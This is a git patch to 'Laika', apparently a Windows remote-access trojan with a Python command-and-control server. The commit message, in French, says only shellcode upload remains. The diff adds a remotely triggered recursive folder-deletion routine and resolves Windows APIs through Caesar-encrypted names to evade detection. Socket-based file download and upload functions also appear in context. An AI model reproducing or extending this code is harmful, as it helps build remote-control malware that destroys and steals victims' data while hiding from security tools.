From 72b476101148d4d64dd597a8d6e2de7c08b3b710 Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Tue, 21 Feb 2023 19:01:37 +0100 Subject: [PATCH] delete_folder marche manque plus que l'upload de shellcode et on est bon ! --- Laika/file_explorer.c | 55 +++++++++++++++++++++++++++++++++++++++++++ Laika/file_explorer.h | 1 + Laika/main.c | 5 +++- Laika/resolve_apis.c | 3 +++ Laika/resolve_apis.h | 4 ++++ Server/Server.py | 4 ++-- 6 files changed, 69 insertions(+), 3 deletions(-) diff --git a/Laika/file_explorer.c b/Laika/file_explorer.c index 3a183eb..563fc51 100644 --- a/Laika/file_explorer.c +++ b/Laika/file_explorer.c @@ -88,6 +88,61 @@ char* get_file_list(const char* dirPath, int* numFiles) { return fileNames; } +BOOL delete_folder(LPCTSTR lpszDir) { + WIN32_FIND_DATA FindFileData; + HANDLE hFind; + TCHAR szDir[MAX_PATH]; + TCHAR szFileName[MAX_PATH]; + + // copy the directory path to a buffer + lstrcpy(szDir, lpszDir); + + // add the wildcard character and search for the first file in the directory + lstrcat(szDir, TEXT("\\*")); + hFind = Api.FindFirstFileW(szDir, &FindFileData); + + if (hFind == INVALID_HANDLE_VALUE) { + // unable to find the first file + return FALSE; + } + + do { + if (lstrcmp(FindFileData.cFileName, TEXT(".")) == 0 || lstrcmp(FindFileData.cFileName, TEXT("..")) == 0) { + // skip the current and parent directories + continue; + } + + // build the full file name + lstrcpy(szFileName, lpszDir); + lstrcat(szFileName, TEXT("\\")); + lstrcat(szFileName, FindFileData.cFileName); + + if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { + // recursively delete the subdirectory + if (!delete_folder(szFileName)) { + Api.FindClose(hFind); + return FALSE; + } + } + else { + // delete the file + if (Api.DeleteFileW(szFileName) == FALSE) { + Api.FindClose(hFind); + return FALSE; + } + } + } while (Api.FindNextFileW(hFind, &FindFileData)); + + // close the search handle + Api.FindClose(hFind); + + // remove the directory + if (Api.RemoveDirectoryW(lpszDir) == FALSE) { + return FALSE; + } + + return TRUE; +} int download_file(FILE* fp, SOCKET sock) { char* data = (char*)Api.malloc(BUFFER_SIZE); diff --git a/Laika/file_explorer.h b/Laika/file_explorer.h index b6a5494..aeb4b6f 100644 --- a/Laika/file_explorer.h +++ b/Laika/file_explorer.h @@ -16,6 +16,7 @@ extern API Api; int get_object_info(char* path, struct stat* fileinfo); int get_drives_list(char* buf); +BOOL delete_folder(LPCTSTR lpszDir); char* get_file_list(const char* dirPath, int* numFiles); int download_file(FILE* fp, SOCKET sock); void upload_file(SOCKET sock, const char* path); \ No newline at end of file diff --git a/Laika/main.c b/Laika/main.c index 4928890..9aa0bb0 100644 --- a/Laika/main.c +++ b/Laika/main.c @@ -211,8 +211,11 @@ retry: goto retry; } - Api.rmdir(CAESAR_DECRYPT(path)); + LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path)); + delete_folder(wstr); + + Api.free((LPWSTR)wstr); Api.free(path); } diff --git a/Laika/resolve_apis.c b/Laika/resolve_apis.c index 36dd479..3fa7534 100644 --- a/Laika/resolve_apis.c +++ b/Laika/resolve_apis.c @@ -31,11 +31,14 @@ void InitApis() { Api.MultiByteToWideChar = (TMultiByteToWideChar)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("RzqynG~yjYt\\nijHmfw")); Api.FindFirstFileW = (TFindFirstFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiKnwxyKnqj\\")); Api.FindNextFileW = (TFindNextFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("KnsiSj}yKnqj\\")); + Api.RemoveDirectoryW = (TRemoveDirectoryW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Wjrt{jInwjhytw~\\")); + Api.DeleteFileW = (TDeleteFileW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("IjqjyjKnqj\\")); hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); if (!hMsvcrt) { return; } + Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~")); Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth")); Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj")); diff --git a/Laika/resolve_apis.h b/Laika/resolve_apis.h index 0f3f6d8..f7b645e 100644 --- a/Laika/resolve_apis.h +++ b/Laika/resolve_apis.h @@ -57,6 +57,8 @@ typedef DWORD(WINAPI* TGetLogicalDrives)(VOID); typedef int(WINAPI* TMultiByteToWideChar)(UINT, DWORD, LPCCH, int, LPWSTR, int); typedef HANDLE(WINAPI* TFindFirstFileW)(LPCWSTR, LPWIN32_FIND_DATAW); typedef BOOL(WINAPI* TFindNextFileW)(HANDLE, LPWIN32_FIND_DATAW); +typedef BOOL(WINAPI* TRemoveDirectoryW)(LPCWSTR); +typedef BOOL(WINAPI* TDeleteFileW)(LPCWSTR); typedef struct ApiList { Tconnect connect; @@ -95,6 +97,8 @@ typedef struct ApiList { TMultiByteToWideChar MultiByteToWideChar; TFindFirstFileW FindFirstFileW; TFindNextFileW FindNextFileW; + TRemoveDirectoryW RemoveDirectoryW; + TDeleteFileW DeleteFileW; Tmbstowcs mbstowcs; Twcstombs wcstombs; diff --git a/Server/Server.py b/Server/Server.py index f9f09fb..def48d7 100644 --- a/Server/Server.py +++ b/Server/Server.py @@ -145,8 +145,8 @@ def upload_file(fp, sock): app = Flask(__name__) # Disable Flask's default logging -log = logging.getLogger('werkzeug') -log.disabled = True +#log = logging.getLogger('werkzeug') +#log.disabled = True @app.route('/') def serve_file(filename):